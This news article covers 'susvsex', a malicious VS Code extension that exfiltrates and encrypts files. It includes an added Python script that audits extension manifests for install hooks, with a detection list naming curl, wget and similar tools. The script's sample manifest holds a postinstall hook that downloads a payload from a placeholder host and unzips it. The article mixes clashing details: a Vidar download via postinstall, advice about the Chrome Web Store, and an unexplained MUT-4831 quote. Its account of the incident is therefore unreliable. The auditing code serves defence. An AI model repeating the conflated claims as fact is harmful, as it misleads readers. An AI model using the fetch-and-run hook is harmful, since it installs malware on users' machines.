A new and truly malicious extension for Visual Studio Code recently appeared. Named “susvsex,” it has built-in ransomware capabilities that set off alarm bells in the security community. Uploaded on November 5, 2025 by a user going by “FIRE SUS SUCKER,” the extension carried the description “Just testing.” While this unassuming description sounds harmless, it hides a dark purpose: the extension exfiltrates and encrypts user files.
To do this, the extension creates a ZIP archive of the target directory and exfiltrates it as a single file to a remote server. Once the upload is done, “susvsex” overwrites the original files with their encrypted counterparts. This behavior suggests the extension was designed for malicious purposes from the outset, raising questions about its origins and intent.
Details of the Malicious Functionality
As noted earlier, the purpose of “susvsex” is best understood by looking at its attack chain. Once installed, the extension uses a postinstall script to download a ZIP archive containing a Vidar executable from an external server. This first step sets the stage for the rest of the ransomware’s work.
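Because the payload is fetched by a lifecycle script rather than by the extension’s own code, a defender’s first triage step is to audit the `package.json` of every installed extension for install-time hooks that download or run something. The script below is an added example, not code from the article or from the extension; the detection patterns and the sample manifest are constructed for illustration.

```python
import json
import re
from pathlib import Path
from typing import Dict, List

# Lifecycle hooks that npm runs automatically around install; the extension
# described above used "postinstall" to fetch its payload.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristic indicators of a download-and-run step (assumed list, not exhaustive).
DOWNLOAD_PATTERNS = [
    r"https?://",
    r"\bcurl\b", r"\bwget\b", r"Invoke-WebRequest", r"\biwr\b",
    r"\bunzip\b", r"Expand-Archive",
    r"\bchmod\s+\+x\b", r"\.exe\b",
]

def audit_package_json(text: str) -> List[Dict[str, str]]:
    """Return one finding per lifecycle hook whose command looks like it fetches or runs a payload."""
    try:
        pkg = json.loads(text)
    except json.JSONDecodeError:
        return [{"hook": "-", "command": "", "matched": "package.json is not valid JSON"}]
    scripts = pkg.get("scripts", {})
    findings = []
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not isinstance(cmd, str):
            continue
        hits = [p for p in DOWNLOAD_PATTERNS if re.search(p, cmd, re.IGNORECASE)]
        if hits:
            findings.append({"hook": hook, "command": cmd, "matched": ", ".join(hits)})
    return findings

def audit_extensions_dir(root: Path) -> Dict[str, List[Dict[str, str]]]:
    """Audit every <extension>/package.json under an extensions directory (e.g. ~/.vscode/extensions)."""
    results = {}
    for manifest in root.glob("*/package.json"):
        findings = audit_package_json(manifest.read_text(encoding="utf-8", errors="replace"))
        if findings:
            results[manifest.parent.name] = findings
    return results

# Constructed sample manifest modelled on the behaviour described above (not the real extension's).
SAMPLE_MANIFEST = json.dumps({
    "name": "example-ext",
    "scripts": {
        "postinstall": "curl -sL http://example.invalid/payload.zip -o p.zip && unzip p.zip",
        "compile": "tsc -p ./",
    },
})

if __name__ == "__main__":
    for finding in audit_package_json(SAMPLE_MANIFEST):
        print(finding)
```

Run it against a real extensions directory with `audit_extensions_dir(Path.home() / ".vscode" / "extensions")`; a hit is a reason to inspect the extension, not proof of malice, since legitimate build steps occasionally download tooling too.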
“Automatically zips, uploads, and encrypts files from C:\Users\Public\testing (Windows) or /tmp/testing (macOS) on first launch.” – John Tuckner
According to security researchers, the ZIP archive that “susvsex” generates holds the actual payload. It also contains decryption tools and the source code of the command-and-control server. This accidental inclusion alone raises further questions about the developer’s competence or intent.
“Extraneous comments which detail functionality, README files with execution instructions, and placeholder variables are clear signs of ‘vibe-coded’ malware.” – John Tuckner
The extension’s GitHub repository is under the account “aykhanmv,” and the developer claims to be located in Baku, Azerbaijan. The email address for the publisher account “suspublisher18” is donotsupport@example.com, a choice that further increases their anonymity and adds to the doubts about the developer’s trustworthiness.
Rapid Response and Removal
Microsoft moved swiftly once it learned of “susvsex,” removing the extension from the official VS Code Extension Marketplace on November 6, one day after it was uploaded. This quick response shows the value of preparedness against the risks and threats that accompany shiny new tools.
Here’s what security experts have said about the tactics used by the creator of “susvsex.” Analysts Tesnim Hamdouni, Ian Kretz, and Sebastian Obregaso noted:
“It is not clear why MUT-4831 chose to vary the postinstall script in this way.”
In their analysis, they suggested that such heterogeneous designs can benefit threat actors by helping them evade detection by security countermeasures.
Implications for Developers and Users
The rise of “susvsex” is just the latest reminder of how vulnerable even the most trusted software ecosystems can be. Developers should be on the lookout for suspicious extensions, especially those outside of the Chrome Web Store. In addition, one detail that limits the acute risk for now is that TARGET_DIRECTORY points to a test staging directory used for file manipulation. Subsequent updates, or instructions dispatched over the command-and-control channel, could just as quickly alter that behavior.
“Fortunately, the TARGET_DIRECTORY is configured to be a test staging directory so it would have little impact right now, but is easily updated with an extension release or as a command sent through the C2 channel covered next.” – John Tuckner
As AI plays a larger role in software development, concerns have grown about the technology falling into the hands of malicious actors. The techniques shown by “susvsex” remind us of the need for careful vetting of extensions.